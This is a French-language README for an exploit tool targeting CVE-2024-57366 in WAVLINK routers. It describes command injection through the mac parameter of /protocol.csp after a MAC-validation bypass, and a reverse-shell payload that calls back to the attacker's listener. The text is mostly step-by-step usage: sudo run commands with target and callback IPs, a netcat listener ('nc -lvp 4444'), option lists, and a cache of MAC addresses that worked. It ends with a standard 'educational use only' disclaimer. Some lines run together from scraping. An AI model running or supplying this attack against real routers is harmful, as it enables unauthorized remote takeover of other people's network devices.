
Exploit d'exécution de code à distance pour CVE-2024-57366 ciblant les routeurs WAVLINK via un contournement de validation d'adresse MAC et une injection de commandes, avec enregistrement WiFi automatique et livraison de payload de shell inversé.
Un exploit robuste pour CVE-2024-57366 permettant l'exécution de code à distance sur les routeurs vulnérables via un contournement de la validation des adresses MAC et une injection de commandes.
Il s'agit d'un exploit post-authentification qui nécessite que la fonction « Remote Control » (contrôle à distance) du routeur soit activée, ainsi que le mot de passe administrateur. Le nom d'utilisateur administrateur est codé en dur sur « admin ».
sudo (requis pour la gestion des interfaces réseau)pip3 install requests
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Script will ask: "Use cached MAC for quick exploit? (y/n):" - say "y"
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full
python3 exploit.py --list-cached
--target - Adresse IP du routeur cible (défaut : 127.0.0.1)--port - Port du routeur cible (défaut : 80)--local-ip - Votre adresse IP locale pour le callback du reverse shell--local-port - Port local pour le callback du reverse shell (défaut : 4444)--password - Mot de passe administrateur du routeur--ssid - Nom du réseau WiFi (défaut : WAVLINK-Mesh_DC4B)--force-full - Force l'exploit complet, ignore la vérification du MAC en cache--list-cached - Liste les adresses MAC en cache et quitteCVE-2024-57366 exploite un contournement de la validation des adresses MAC dans le firmware du routeur. La vulnérabilité permet une injection de commandes via le paramètre mac dans le point de terminaison /protocol.csp.
eth0 pour préserver le contexte réseau d'origineindex=1, jeton dans le chemin de l'URL)L'exploit met automatiquement en cache les adresses MAC réussies dans successful_macs.txt :
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here
32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08
Ajout manuel de MAC : Modifiez successful_macs.txt et ajoutez des lignes comme :
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08
# Start netcat listener
nc -lvp 4444
# Run exploit
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# When prompted to save MAC address, say "y"
# Start netcat listener
nc -lvp 4444
# Run exploit (will use cached MAC)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Say "y" when asked about using cached MAC
« Aucun adaptateur sans fil trouvé »
sudo« Échec de la validation de l'adresse MAC »
« Délai de requête dépassé »
« Le reverse shell ne se connecte pas »
--local-ip est correct (utilisez ip addr show eth0)CVE-2024-57366/
├── exploit.py # Main exploit script
├── successful_macs.txt # MAC address cache (auto-generated)
└── README.md # This file
Cet outil est destiné uniquement à des fins éducatives et de tests autorisés. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester. Les auteurs ne sont pas responsables de toute mauvaise utilisation de cet outil.
/protocol.cspCe projet est fourni tel quel à des fins éducatives. Utilisez-le de manière responsable et conformément aux lois et réglementations applicables.